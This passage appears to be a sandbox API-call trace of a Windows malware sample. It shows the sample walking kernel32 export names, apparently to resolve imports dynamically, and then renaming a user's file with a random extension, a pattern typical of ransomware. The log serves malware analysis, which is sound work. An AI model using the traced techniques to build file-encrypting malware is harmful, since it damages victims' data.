returned="CreateDirectoryExA" [0082.457] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.457] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.457] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.457] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.457] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.457] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.457] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.457] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.457] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.458] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.458] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.458] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.458] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.458] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.458] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.458] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.458] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.458] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.459] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.459] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.459] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.459] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.459] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.459] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.459] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.459] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.459] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.459] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.459] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.459] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.459] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.459] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.459] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.459] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.459] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.459] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.460] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.460] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.460] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.460] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.460] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.460] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.460] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.460] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.460] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.460] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.460] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.460] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.460] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.460] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.460] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.460] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.460] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.460] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.461] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.461] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.461] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.461] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.461] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.461] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.461] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.461] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.461] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.461] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.461] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.461] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.461] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.461] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.461] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.461] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.461] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.461] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.461] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.461] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.462] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.462] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.462] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.462] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.462] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.462] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.462] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.462] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.462] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.462] lstrlenA (lpString="DELETEATOM") returned 10 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.462] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.462] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.462] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.462] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.462] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.462] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.462] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.462] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.462] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.463] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.463] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.463] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.463] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.463] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.463] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.463] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.463] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.463] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.463] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.463] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.463] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.463] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.463] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.463] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.463] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.463] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.463] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.463] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.464] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.464] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.464] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.464] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.464] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.464] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.464] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.464] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.464] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.464] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.464] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.464] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.464] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.464] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.464] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.464] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.465] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3") returned 63 [0082.465] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3.bfWPTNS") returned 71 [0082.465] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RVu8ePGXop9R2.mp3" (normalized: "c:\\users\\5p5nrgjn0js 